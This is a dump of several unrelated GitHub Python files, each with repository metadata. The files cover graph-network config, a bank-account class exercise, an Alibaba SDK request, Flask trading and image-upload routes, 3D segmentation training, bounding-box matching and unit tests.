name\n cfg.dataset = 'ZINC'\n # Additional num of worker for data loading\n cfg.num_workers = 12\n # Cuda device number, used for machine with multiple gpus\n cfg.device = 0 \n # Additional string add to logging \n cfg.handtune = ''\n # Whether fix the running seed to remove randomness\n cfg.seed = None\n # version \n cfg.version = 'final'\n # task, for simulation datasets\n cfg.task = -1\n # amp \n cfg.amp = False\n\n # ------------------------------------------------------------------------ #\n # Training options\n # ------------------------------------------------------------------------ #\n cfg.train = CN()\n # Total graph mini-batch size\n cfg.train.batch_size = 100\n # Maximal number of epochs\n cfg.train.epochs = 100\n # Number of runs with random init \n cfg.train.runs = 3\n # Base learning rate\n cfg.train.lr = 0.001\n # number of steps before reduce learning rate\n cfg.train.lr_patience = 50\n # learning rate decay factor\n cfg.train.lr_decay = 0.5\n # L2 regularization, weight decay\n cfg.train.wd = 0.\n # Dropout rate\n cfg.train.dropout = 0.\n \n # ------------------------------------------------------------------------ #\n # Model options\n # ------------------------------------------------------------------------ #\n cfg.model = CN()\n cfg.model.arch_type = 'KCSetGNN' # ['SubgraphGNN', 'KCSetGNN', 'PPGN', 'GNN']\n cfg.model.gnn_type = 'GINEConv' # GNN type used, see core.model_utils.pyg_gnn_wrapper for all options\n cfg.model.bgnn_type = 'Sequential' # [main param] bipartite gnn propagation type, Sequential or Parallel\n \n cfg.model.hidden_size = 128 # hidden size of the model\n cfg.model.num_layers = 4 # [main param] number of bipartite message passing layers\n cfg.model.num_inners = 2 # [main param] number of base model layers\n cfg.model.pools = ['add'] # multiple different aggregations, will be used by SetGNN to stablize training\n cfg.model.half_step = False # always be set to False\n\n # ------------------------------------------------------------------------ #\n # Subgraph options\n # ------------------------------------------------------------------------ #\n cfg.subgraph = CN()\n cfg.subgraph.type = 'kWL' # ['kWL', 'cluster', 'ego']\n cfg.subgraph.kmax = 3 # [main param] parameter k in the paper\n cfg.subgraph.kmin = 0 # current implementation doesn't support values other than 0 \n cfg.subgraph.stack = True # use (k,c) set or (k,c)(<=) set. Set to True will include sets with smaller size than kmax. \n cfg.subgraph.num_components = 1 # [main param] parameter c in the paper\n cfg.subgraph.zero_init = True # whether init multiple-components sets with 0\n\n return cfg\n \nimport os \nimport argparse\n# Principle means that if an option is defined in a YACS config object, \n# then your program should set that configuration option using cfg.merge_from_list(opts) and not by defining, \n# for example, --train-scales as a command line argument that is then used to set cfg.TRAIN.SCALES.\n\ndef update_cfg(cfg, args_str=None):\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default=\"\", metavar=\"FILE\", help=\"Path to config file\")\n # opts arg needs to match set_cfg\n parser.add_argument(\"opts\", default=[], nargs=argparse.REMAINDER, \n help=\"Modify config options using the command-line\")\n\n if isinstance(args_str, str):\n # parse from a string\n args = parser.parse_args(args_str.split())\n else:\n # parse from command line\n args = parser.parse_args()\n # Clone the original cfg \n cfg = cfg.clone()\n \n # Update from config file\n if os.path.isfile(args.config):\n cfg.merge_from_file(args.config)\n\n # Update from command line \n cfg.merge_from_list(args.opts)\n \n return cfg\n\n\"\"\"\n Global variable\n\"\"\"\ncfg = set_cfg(CN())","repo_name":"LingxiaoShawn/KCSetGNN","sub_path":"core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"71338976550","text":"import itertools\nimport numbers\nfrom datetime import timedelta, datetime\nfrom collections import namedtuple\n\n\nConfirmation = namedtuple('Confirmation', 'account_number, transaction_code, transaction_id, time_utc, time')\n\n\nclass TimeZone:\n def __init__(self, name, offset_hours, offset_minutes):\n if name is None or len(str(name).strip()) == 0:\n raise ValueError('Timezone name cannot be empty.')\n\n self._name = str(name).strip()\n # technically we should check that offset is a\n if not isinstance(offset_hours, numbers.Integral):\n raise ValueError('Hour offset must be an integer.')\n\n if not isinstance(offset_minutes, numbers.Integral):\n raise ValueError('Minutes offset must be an integer.')\n\n if offset_minutes < -59 or offset_minutes > 59:\n raise ValueError('Minutes offset must between -59 and 59 (inclusive).')\n\n # for time delta sign of minutes will be set to sign of hours\n offset = timedelta(hours=offset_hours, minutes=offset_minutes)\n\n # offsets are technically bounded between -12:00 and 14:00\n # see: https://en.wikipedia.org/wiki/List_of_UTC_time_offsets\n if offset < timedelta(hours=-12, minutes=0) or offset > timedelta(hours=14, minutes=0):\n raise ValueError('Offset must be between -12:00 and +14:00.')\n\n self._offset_hours = offset_hours\n self._offset_minutes = offset_minutes\n self._offset = offset\n\n @property\n def offset(self):\n return self._offset\n\n @property\n def name(self):\n return self._name\n\n def __eq__(self, other):\n return (isinstance(other, TimeZone) and\n self.name == other.name and\n self._offset_hours == other._offset_hours and\n self._offset_minutes == other._offset_minutes)\n\n def __repr__(self):\n return (f\"TimeZone(name='{self.name}'.\"\n f\"offset_hours={self._offset_hours},\"\n f\"offset_minutes={self._offset_minutes}\")\n\n\nclass Account:\n transaction_counter = itertools.count(100)\n _interest_rate = 0.5\n\n _transaction_codes = {\n 'deposit': 'D',\n 'withdraw': 'W',\n 'interes': 'I',\n 'rejected': 'X'\n }\n\n def __init__(self, account_number, firt_name, last_name, timezone=None, initial_balance=0):\n self._account_number = account_number\n self.first_name = firt_name\n self.last_name = last_name\n\n if timezone is None:\n timezone = TimeZone('UTC', 12, 0)\n self.timezone = timezone\n self._balance = Account.validate_real_number(initial_balance, min_value=0) # Static Method\n\n @property\n def account_number(self):\n return self._account_number\n\n @property\n def first_name(self):\n return self._first_name\n\n @first_name.setter\n def first_name(self, value):\n self.validate_and_set_name('_first_name', value, 'First Name')\n\n @property\n def last_name(self):\n return self._last_name\n\n @last_name.setter\n def last_name(self, value):\n self.validate_and_set_name('_last_name', value, 'Last Name')\n\n @property\n def full_name(self):\n return f'{self.first_name} {self.last_name}'\n\n @property\n def timezone(self):\n return self._timezone\n\n @property\n def balance(self):\n return self._balance\n\n @timezone.setter\n def timezone(self, value):\n if not isinstance(value, TimeZone):\n raise ValueError('Time Zone must be a valid TimeZone object.')\n self._timezone = value\n\n @classmethod\n def get_interest_rate(cls):\n return cls._interest_rate\n\n @classmethod\n def set_interest_rate(cls, value):\n if not isinstance(value, numbers.Real):\n raise ValueError('Interest must be a real number.')\n if value < 0:\n raise ValueError('Interest rate cannot be a negative.')\n cls._interest_rate = value\n\n def validate_and_set_name(self, property_name: str, value: str, field_title: str):\n if value is None or len(str(value).strip()) == 0:\n raise ValueError(f'{field_title} cannot be empty.')\n setattr(self, property_name, value)\n\n @staticmethod\n def validate_real_number(value, min_value=None):\n if not isinstance(value, numbers.Real):\n raise ValueError('Value must be a real number.')\n if min_value is not None and value < min_value:\n raise ValueError(f'Value must be at least {min_value}')\n return value\n\n def generate_confirmation_code(self, transaction_code):\n dt_str = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n return f'''{transaction_code}-{self._account_number}-\n {dt_str}-{next(Account.transaction_counter)}'''\n\n @staticmethod\n def parse_confirmation_code(confirmation_code, preferred_time_zone=None):\n parts = confirmation_code.split('-')\n if len(parts) != 4:\n raise ValueError('Invalid confirmation code!!!')\n\n transaction_code, account_number, raw_dt_utc, transaction_id = parts\n\n try:\n dt_utc = datetime.strptime(raw_dt_utc, '%Y%m%d%H%M%S')\n except ValueError as ex:\n raise ValueError('Invalid transaction datetime') from ex\n\n if preferred_time_zone is None:\n preferred_time_zone = TimeZone('UTC', 0, 0)\n if not isinstance(preferred_time_zone, TimeZone):\n raise ValueError('Invalid TimeZone Specified')\n\n dt_preffered = dt_utc + preferred_time_zone.offset\n dt_preffered_str = f'''{dt_preffered.strftime('%Y-%m-%d %H:%M:%S')}\n ({preferred_time_zone.name})'''\n return Confirmation(account_number, transaction_code,\n transaction_id, dt_utc.isoformat(), dt_preffered_str)\n\n def deposit(self, value):\n if not isinstance(value, numbers.Real):\n raise ValueError('Deposit value must be a real number.')\n if value <= 0:\n raise ValueError('Deposist value must ba a positive number.')\n\n transaction_code = Account._transaction_codes['deposit'] # Class Property\n conf_code = self.generate_confirmation_code(transaction_code)\n self._balance += value\n return conf_code\n\n def withdraw(self, value):\n accepted = False\n if self.balance - value < 0:\n transaction_code = Account._transaction_codes['rejected']\n else:\n transaction_code = Account._transaction_codes['withdraw']\n accepted = True\n\n conf_code = self.generate_confirmation_code(transaction_code)\n if accepted:\n self._balance -= value\n return conf_code\n\n def pay_interest(self):\n interest = self.balance * Account.get_interest_rate() / 100\n conf_code = self.generate_confirmation_code(self._transaction_codes['interest'])\n self._balance += interest\n return conf_code\n\n\na = Account('A100', 'Eric', 'Idle', initial_balance=100)\n\n# try:\n# a.deposit(-100)\n# except ValueError as ex:\n# print(ex)\n#\n# try:\n# a.withdraw(\"100\")\n# except ValueError as ex:\n# print(ex)\n","repo_name":"Koubae/Programming-CookBook","sub_path":"Programming Languages/Python/Basics/Part -4- OOP/Proj_1/bank_account2.py","file_name":"bank_account2.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"71"} +{"seq_id":"10998572615","text":"from typing import List\nfrom topsdk.client import BaseRequest\nfrom topsdk.util import convert_struct_list,convert_basic_list,convert_struct,convert_basic\nfrom datetime import datetime\n\n\nclass AlibabaItemPublishSchemaGetRequest(BaseRequest):\n\n def __init__(\n self,\n images: list = None,\n item_type: str = None,\n biz_type: str = None,\n market: str = None,\n cat_id: int = None,\n spu_id: int = None,\n barcode: str = None\n ):\n \"\"\"\n 商品主图链接,最多5张,传入完整URL\n \"\"\"\n self._images = images\n \"\"\"\n 商品类型。b:一口价 a:���卖 默认值b一口价\n \"\"\"\n self._item_type = item_type\n \"\"\"\n 业务扩展参数,需与平台约定好\n \"\"\"\n self._biz_type = biz_type\n \"\"\"\n 商品发布的市场。taobao:淘宝,tmall:天猫,litetao:淘宝特价版\n \"\"\"\n self._market = market\n \"\"\"\n 商品类目ID\n \"\"\"\n self._cat_id = cat_id\n \"\"\"\n 产品ID,天猫市场(market=tmall)时必填\n \"\"\"\n self._spu_id = spu_id\n \"\"\"\n 商品条码\n \"\"\"\n self._barcode = barcode\n\n @property\n def images(self):\n return self._images\n\n @images.setter\n def images(self, images):\n if isinstance(images, list):\n self._images = images\n else:\n raise TypeError(\"images must be list\")\n\n @property\n def item_type(self):\n return self._item_type\n\n @item_type.setter\n def item_type(self, item_type):\n if isinstance(item_type, str):\n self._item_type = item_type\n else:\n raise TypeError(\"item_type must be str\")\n\n @property\n def biz_type(self):\n return self._biz_type\n\n @biz_type.setter\n def biz_type(self, biz_type):\n if isinstance(biz_type, str):\n self._biz_type = biz_type\n else:\n raise TypeError(\"biz_type must be str\")\n\n @property\n def market(self):\n return self._market\n\n @market.setter\n def market(self, market):\n if isinstance(market, str):\n self._market = market\n else:\n raise TypeError(\"market must be str\")\n\n @property\n def cat_id(self):\n return self._cat_id\n\n @cat_id.setter\n def cat_id(self, cat_id):\n if isinstance(cat_id, int):\n self._cat_id = cat_id\n else:\n raise TypeError(\"cat_id must be int\")\n\n @property\n def spu_id(self):\n return self._spu_id\n\n @spu_id.setter\n def spu_id(self, spu_id):\n if isinstance(spu_id, int):\n self._spu_id = spu_id\n else:\n raise TypeError(\"spu_id must be int\")\n\n @property\n def barcode(self):\n return self._barcode\n\n @barcode.setter\n def barcode(self, barcode):\n if isinstance(barcode, str):\n self._barcode = barcode\n else:\n raise TypeError(\"barcode must be str\")\n\n\n def get_api_name(self):\n return \"alibaba.item.publish.schema.get\"\n\n def to_dict(self):\n request_dict = {}\n if self._images is not None:\n request_dict[\"images\"] = convert_basic_list(self._images)\n\n if self._item_type is not None:\n request_dict[\"item_type\"] = convert_basic(self._item_type)\n\n if self._biz_type is not None:\n request_dict[\"biz_type\"] = convert_basic(self._biz_type)\n\n if self._market is not None:\n request_dict[\"market\"] = convert_basic(self._market)\n\n if self._cat_id is not None:\n request_dict[\"cat_id\"] = convert_basic(self._cat_id)\n\n if self._spu_id is not None:\n request_dict[\"spu_id\"] = convert_basic(self._spu_id)\n\n if self._barcode is not None:\n request_dict[\"barcode\"] = convert_basic(self._barcode)\n\n return request_dict\n\n def get_file_param_dict(self):\n file_param_dict = {}\n return file_param_dict\n\n","repo_name":"LIANGCYRUS/TopApiSite","sub_path":"apps/topsdk/defaultability/request/alibaba_item_publish_schema_get_request.py","file_name":"alibaba_item_publish_schema_get_request.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10880032391","text":"from flask import Flask, request\nfrom app import App\n\nclass Routes():\n flask_app = Flask(__name__)\n application = App()\n \n ################Strategy#######################\n\n # route to add a strategy (with parameters)\n @flask_app.route(\"/add_simple\", methods=['POST'])\n def add_strategy_simple():\n try:\n name = request.form['name']\n ticker = request.form['ticker']\n interval = float(request.form['interval'])\n qty = float(request.form['qty'])\n except Exception as e:\n return str(e), 400\n\n # add the strategy to app\n return app.application.add_strategy_simple(name, ticker, interval, qty)\n \n # route to add a strategy (with parameters)\n @flask_app.route(\"/add_rnn\", methods=['POST'])\n def add_strategy_rnn():\n try:\n name = request.form['name']\n ticker = request.form['ticker']\n interval = float(request.form['interval'])\n qty = float(request.form['qty'])\n\n \n default = True if request.form['default'] == \"True\" else False\n if not default:\n units = int(request.form['units'])\n epoch = int(request.form['epoch'])\n\n return app.application.add_strategy_RNN(name, ticker, interval, qty, default, units=units, epoch=epoch)\n except Exception as e:\n return str(e), 400\n\n # add the strategy to app\n return app.application.add_strategy_RNN(name, ticker, interval, qty, default)\n \n ###############################################\n\n # List all the strategies on the app\n @flask_app.route(\"/list_strategy\", methods=['GET'])\n def list_strategy():\n return app.application.list_strategy()\n \n # List all workers on the app\n @flask_app.route(\"/list_worker\", methods=['GET'])\n def list_worker():\n return app.application.list_worker()\n \n # Execute a estrategy\n @flask_app.route(\"/exec\", methods=['POST'])\n def exec_strategy():\n strategy_name = request.form['strategy_name']\n worker_name = request.form['worker_name']\n return app.application.exec_strategy(strategy_name, worker_name)\n \n # Info of a strategy\n @flask_app.route(\"/strategy_info\", methods=['POST'])\n def info_strategy():\n worker_name = request.form['name']\n return app.application.info_strategy(worker_name)\n \n # Stop a strategy\n @flask_app.route(\"/stop\", methods=['POST'])\n def stop_worker_strategy():\n worker_name = request.form['name']\n return app.application.stop_worker_strategy(worker_name)\n \n # Stop a strategy\n @flask_app.route(\"/start\", methods=['POST'])\n def start_worker_strategy():\n worker_name = request.form['name']\n return app.application.start_worker_strategy(worker_name)\n \n # Worker status\n @flask_app.route(\"/is_active\", methods=['POST'])\n def status_worker_strategy():\n worker_name = request.form['name']\n return app.application.is_active_worker_strategy(worker_name)\n\n # Delete a strategy\n @flask_app.route(\"/delete_strategy\", methods=['POST'])\n def delete_strategy():\n strategy_name = request.form['name']\n return app.application.delete_strategy(strategy_name)\n \n # Delete a worker\n @flask_app.route(\"/delete_worker\", methods=['POST'])\n def delete_worker_strategy():\n worker_name = request.form['name']\n return app.application.delete_worker(worker_name)\n\n # Stats of a worker\n @flask_app.route(\"/stats_worker\", methods=['POST'])\n def stats_worker_strategy():\n worker_name = request.form['name']\n return app.application.stats_worker(worker_name)\n\n\nif __name__ == '__main__':\n app = Routes()\n app.flask_app.run(host=\"0.0.0.0\", debug=True, use_debugger=False, use_reloader=False)","repo_name":"jaimex200/Herramienta-de-Inversion-Algoritmica","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40304793662","text":"import os\nimport logging\nimport numpy as np\nfrom configargparse import ArgumentParser\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport torch\nfrom pathlib import Path\nimport tempfile\nimport pytorch_lightning as pl\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch \nimport time\nimport matplotlib.pyplot as plt\nfrom midasmednet.unet.model import ResidualUNet3D\nfrom midasmednet.unet.loss import DiceLoss, WeightedCrossEntropyLoss, dice_metric\nfrom midasmednet.unet.loss import expand_as_one_hot\nfrom midasmednet.utils.plots import vis_logimages, vis_loglabels\nfrom torchvision.utils import make_grid\n\nclass SegmentationNet(ResidualUNet3D):\n\n def __init__(self,\n hparams,\n training_dataset=None,\n validation_dataset=None):\n\n # create model\n super(SegmentationNet, self).__init__(hparams.in_channels, hparams.out_channels,\n final_sigmoid=False, f_maps= hparams.fmaps)\n # copy over\n self.hparams = hparams\n self.training_dataset = training_dataset\n self.validation_dataset = validation_dataset\n self.learning_rate = hparams.learning_rate\n self.num_workers = hparams.num_workers\n self.batch_size = hparams.batch_size\n self.out_channels = hparams.out_channels\n self.in_channels = hparams.in_channels\n\n # set loss criterion\n if hasattr(hparams, 'loss'):\n assert hparams.loss in ['DICE', 'CE']\n loss_weight = torch.tensor(hparams.loss_weight)\n if hparams.loss == 'DICE':\n self.loss = DiceLoss(weight=loss_weight)\n elif hparams.loss == 'CE':\n self.loss = torch.nn.CrossEntropyLoss(weight=loss_weight)\n\n # optional\n self.log_interval = hparams.log_interval if hasattr(hparams, 'log_interval') else 5\n self.log_vis_mip = hparams.log_vis_mip if hasattr(hparams, 'log_vis_mip') else 'mean'\n \n # initialization\n self.logger = logging.getLogger(__name__)\n\n def training_step(self, batch, batch_nb):\n inputs = batch['data'].float()\n labels = batch['label'][:, -1, ...].long()\n # output of the network is assumed to be un-normalized\n outputs = self(inputs)\n loss = self.loss(outputs, labels)\n tensorboard_logs = {\"train_loss\": loss.item()}\n return {'loss': loss, 'log': tensorboard_logs}\n\n def log_samples(self, batch, outputs, batch_id):\n # extract data\n inputs = batch['data'].float().cpu().numpy()\n labels = batch['label'][:, -1, ...].long().cpu().numpy()\n prediction = F.softmax(outputs, dim=1)\n pred_class = torch.argmax(prediction, dim=1).cpu().numpy()\n\n with tempfile.TemporaryDirectory() as test:\n png_path = str(Path(test)/'tmp.png')\n\n # images\n fig, ax = vis_logimages(inputs[0, ...])\n plt.title(f\"epoch {self.current_epoch} batch {batch_id}\")\n plt.savefig(png_path, bbox_inches='tight',pad_inches = 0, dpi = 200) \n plt.close(fig)\n self.logger[1].experiment.log_image('images', png_path)\n\n # labels\n fig, ax = vis_loglabels(labels[0, ...], pred_class[0, ...],\n inputs=inputs[0, 0, ...],\n projection_type=self.log_vis_mip)\n plt.title(f\"epoch {self.current_epoch} batch {batch_id}\")\n plt.savefig(png_path, bbox_inches='tight',pad_inches = 0, dpi = 200) \n plt.close(fig)\n self.logger[1].experiment.log_image('labels', png_path)\n return\n\n def validation_step(self, batch, batch_nb):\n inputs = batch['data'].float()\n labels = batch['label'][:, -1, ...].long()\n # output of the network is assumed to be un-normalized\n outputs = self(inputs)\n # log samples \n if batch_nb%self.log_interval == 0:\n self.log_samples(batch, outputs, batch_id=batch_nb)\n # metrics\n loss = self.loss(outputs, labels)\n per_channel_dice = dice_metric(outputs, labels)\n # store results to dictionary\n results = {'val_loss': loss}\n for c in range(self.out_channels):\n results[f'val_dice{c}'] = per_channel_dice[c]\n return results\n\n def validation_epoch_end(self, outputs):\n # average metrics over epoch\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n logs = {\"val_loss\": avg_loss}\n for c in range(self.out_channels):\n logs[f\"val_dice{c}\"] = torch.stack([x[f\"val_dice{c}\"] for x in outputs]).mean()\n return {\"val_loss\": avg_loss, \"log\": logs, \"progress_bar\": logs}\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n\n def train_dataloader(self):\n return DataLoader(self.training_dataset, \n batch_size=self.batch_size, \n num_workers=self.num_workers,\n shuffle=True)\n\n def val_dataloader(self):\n return DataLoader(self.validation_dataset, \n batch_size=self.batch_size, \n num_workers=self.num_workers,\n shuffle=False)","repo_name":"tobiashepp/torch-mednet","sub_path":"midasmednet/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"86284874712","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport numpy as np\nimport pytest\n\nfrom sofia_redux.scan.flags.motion_flags import MotionFlags\nfrom sofia_redux.scan.coordinate_systems.coordinate_2d import Coordinate2D\n\n\ndef test_motion_flags():\n flags = MotionFlags\n all_letters = 'xyzijkXYZMntscp'\n for letter in all_letters:\n assert flags.flag_to_letter(flags.letter_to_flag(letter)) == letter\n\n\ndef test_convert_flag():\n flags = MotionFlags\n f = flags.flags\n assert flags.convert_flag(f.NORM) == f.NORM\n assert flags.convert_flag(2) == f.Y\n assert flags.convert_flag('norm') == f.NORM\n assert flags.convert_flag('|x|') == f.X_MAGNITUDE\n assert flags.convert_flag('x^2') == f.X2\n assert flags.convert_flag('mag') == f.MAGNITUDE\n assert flags.convert_flag('nor') == f.NORM\n with pytest.raises(ValueError) as err:\n _ = flags.convert_flag('foo')\n assert 'Unknown flag' in str(err.value)\n with pytest.raises(ValueError) as err:\n _ = flags.convert_flag(1.0)\n assert \"Invalid flag type\" in str(err.value)\n\n\ndef test_init():\n c = Coordinate2D(np.arange(10).reshape((2, 5)))\n flags = MotionFlags('x')\n f = flags.flags\n assert flags.direction == f.X\n assert np.allclose(flags(c), np.arange(5))\n flags = MotionFlags('CHOPPER')\n assert np.all(np.isnan(flags(c)))\n\n\ndef test_get_value():\n c = Coordinate2D(np.arange(10).reshape((2, 5)) - 3)\n f = MotionFlags('y')\n assert np.allclose(f.get_value(c), [2, 3, 4, 5, 6])\n f = MotionFlags('x')\n assert np.allclose(f.get_value(c), [-3, -2, -1, 0, 1])\n f = MotionFlags('|x|')\n assert np.allclose(f.get_value(c), [3, 2, 1, 0, 1])\n f = MotionFlags('y^2')\n assert np.allclose(f.get_value(c), [4, 9, 16, 25, 36])\n f = MotionFlags('mag')\n assert np.allclose(f.get_value(c), [3.6055, 3.6055, 4.1231, 5, 6.0827],\n atol=1e-3)\n f = MotionFlags('norm')\n assert np.allclose(f.get_value(c), [3.6055, 3.6055, 4.1231, 5, 6.0827],\n atol=1e-3)\n\n\ndef test_call():\n c = Coordinate2D(np.arange(10).reshape((2, 5)))\n f = MotionFlags('x')\n assert np.allclose(f(c), [0, 1, 2, 3, 4])\n\n\ndef test_str():\n f = MotionFlags('norm')\n assert str(f) == 'MotionFlags: MotionFlagTypes.NORM'\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/flags/tests/test_motion_flags.py","file_name":"test_motion_flags.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"12872625584","text":"from skimage.metrics import structural_similarity as compare_ssim\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport cv2\n\nclass bb_utils():\n\n def bb_intersection_over_union(self, boxA, boxB):\n '''return the intersection over union value'''\n\n xA = max(boxA[0], boxB[0])\n yA = max(boxA[1], boxB[1])\n xB = min(boxA[2], boxB[2])\n yB = min(boxA[3], boxB[3])\n\n interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n iou = interArea / float(boxAArea + boxBArea - interArea)\n return iou\n\n def associate_bounding_boxes(self, bbox_1, bbox_2):\n '''\n bbox_1: bounding box form image 1\n bbox_2: bounding box form image 2\n Define a Hungarian Matrix with IOU as a metric and return,\n for each box, an corresponding an id if match is found\n '''\n # Define a new IOU Matrix nxm with input boxes\n iou_matrix = np.zeros((len(bbox_1), len(bbox_2)), dtype=np.float32)\n\n # Go through boxes and store the IOU value for each box\n for i, box_1 in enumerate(bbox_1):\n for j, box_2 in enumerate(bbox_2):\n iou_matrix[i][j] = self.bb_intersection_over_union(box_1, box_2)\n\n # Call for the Hungarian Algorithm\n h_row, h_col = linear_sum_assignment(-iou_matrix)\n h_matrix = np.array(list(zip(h_row, h_col)))\n\n # Create new unmatched lists for old and new boxes\n matches = []\n\n # Go through the Hungarian Matrix,\n # if matched element has IOU < threshold (0.4),\n # add it to the matched list\n for h in h_matrix:\n if(iou_matrix[h[0], h[1]] > 0.4):\n matches.append(h.reshape(1, 2))\n\n if(len(matches) == 0):\n matches = np.empty((0, 2), dtype=int)\n else:\n matches = np.concatenate(matches, axis=0)\n return matches\n\n def get_bb_img(self, img, box):\n ''' return image arrray with bounding box dimensions'''\n\n shp = img.shape\n x1 = int(box[0] * shp[1] - box[2] * shp[1] * 0.5) # center_x - width /2\n y1 = int(box[1] * shp[0] - box[3] * shp[0] * 0.5) # center_y - height /2\n x2 = int(box[0] * shp[1] + box[2] * shp[1] * 0.5) # center_x + width/2\n y2 = int(box[1] * shp[0] + box[3] * shp[0] * 0.5) # center_y + height/2\n crop_img = img[y1:y2, x1:x2]\n return crop_img\n\n def check_bb_similarity(self, matched_bboxes, img1, pred_bb_1,\n img2, pred_bb_2, ssim_bb_thres):\n ''' return the ssim score of associated bounding boxes'''\n\n for idx in range(0, matched_bboxes.shape[0]):\n\n bb_im_1 = self.get_bb_img(img1, pred_bb_1[matched_bboxes[idx, 0]].tolist())\n bb_im_2 = self.get_bb_img(img2, pred_bb_2[matched_bboxes[idx, 1]].tolist())\n\n # for ssim both the bbboxes should of same dimension\n # resizing second bbox to first one\n bb_im_2 = cv2.resize(bb_im_2, (bb_im_1.shape[1], bb_im_1.shape[0]),\n interpolation=cv2.INTER_AREA)\n\n # get ssim_score\n (bb_score, _) = compare_ssim(bb_im_1, bb_im_2,\n multichannel=True, full=True)\n\n # the ssim score shoud exceed the threshold score to be similar\n if bb_score <= ssim_bb_thres:\n # print('The BBs are not similar')\n return False\n\n return True\n\n","repo_name":"kar-ab/image_similarity","sub_path":"bb_utils.py","file_name":"bb_utils.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13346235240","text":"from config import *\nimport datasets\nimport copy\n\n\ndef build_dataset_helper(args, aug, source):\n if args.datasetType == 'covidx':\n return datasets.COVIDX(COVIDXConfig, mode=args.mode, source=source, augment=aug)\n elif args.datasetType == 'chestxray14':\n return datasets.ChestXRay14(ChestXray14Config, args.mode, source=source, augment=aug)\n else:\n raise NotImplementedError\n \n\n\ndef build_dataset(args, weak_aug=None, strong_aug=None):\n if args.datasetType == 'assemble':\n args_temp = copy.deepcopy(args)\n datasets_assembling = []\n source = 0\n for assemble_dataset in assemble_datasets:\n args_temp.datasetType = assemble_dataset\n train_set = build_dataset_helper(args_temp, weak_aug, source) \n source += 1\n datasets_assembling.append(train_set)\n train_set = datasets.Assemble(datasets_assembling, augments=[weak_aug, strong_aug])\n else:\n train_set, _ = build_dataset_helper(args.datasetType, weak_aug, 0) \n return train_set","repo_name":"MrGiovanni/LabelAssemble","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"} +{"seq_id":"26035642934","text":"import os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision\nimport torchvision.transforms as tt\nfrom torchvision.utils import save_image\nfrom torchvision.transforms import Compose\nimport numpy as np\nimport torch.nn as nn\nfrom torch.nn.utils import spectral_norm\nimport PIL\nfrom PIL import Image\nfrom Model import UNet \nimport pickle \nfrom flask import Flask, flash, render_template, request, url_for\n# please note the import from `flask_uploads` - not `flask_reuploaded`!!\n# this is done on purpose to stay compatible with `Flask-Uploads`\nfrom flask_uploads import IMAGES, UploadSet, configure_uploads\nfrom flask_cors import CORS\n# # Make url public for colab\n# from flask_ngrok import run_with_ngrok\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__, static_folder='generated')\nphotos = UploadSet(\"photos\", IMAGES)\napp.config[\"UPLOADED_PHOTOS_DEST\"] = \"images\"\napp.config[\"SECRET_KEY\"] = os.urandom(24)\nconfigure_uploads(app, photos)\n\n\nUPLOAD_FOLDER = './images'\nALLOWED_EXTENSIONS = {'png'}\n\n# app = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ntest_dir =\"./\"\n\nCORS(app)\n\n# Start ngrok when the app is running\n# run_with_ngrok(app)\n\ndef denorm(img_tensor):\n return img_tensor*0.5 + 0.5\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# @app.route('/', methods=['GET', 'POST'])\n# def upload_file():\n# if request.method == 'POST':\n# # check if the post request has the file part\n# if 'photo' not in request.files:\n# flash('No file part')\n# return redirect(request.url)\n# photo = request.files['photo']\n# # If the user does not select a file, the browser submits an\n# # empty file without a filename.\n# if photo.filename == '':\n# flash('No selected file')\n# return redirect(request.url)\n# if photo and allowed_file(photo.filename):\n# photoname = secure_filename(photo.filename)\n# photo.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n# return \"Done!!\"\n# return '''\n# \n# Upload new File\n#

Upload new File

\n#
\n# \n# \n#
